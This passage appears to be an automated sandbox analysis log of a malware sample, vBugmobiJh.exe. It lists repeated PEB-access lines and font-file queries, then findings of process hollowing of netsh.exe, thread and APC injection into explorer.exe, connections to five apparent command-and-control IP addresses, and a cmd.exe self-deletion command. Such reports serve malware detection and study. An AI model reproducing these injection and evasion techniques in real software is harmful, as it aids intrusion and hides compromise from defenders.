          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vBugmobiJh.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe  Network Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exe  Network Connect: 154.80.226.18 80
          Source: C:\Windows\explorer.exe  Network Connect: 94.73.146.42 80
          Source: C:\Windows\explorer.exe  Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Memory written: C:\Users\user\Desktop\vBugmobiJh.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\netsh.exe  Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: F90000
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Process created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Process created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Windows\SysWOW64\netsh.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
          Source: explorer.exe, 00000007.00000000.231730781.0000000001398000.00000004.00000020.sdmp  Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmp  Binary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmp  Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Users\user\Desktop\vBugmobiJh.exe VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe  Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
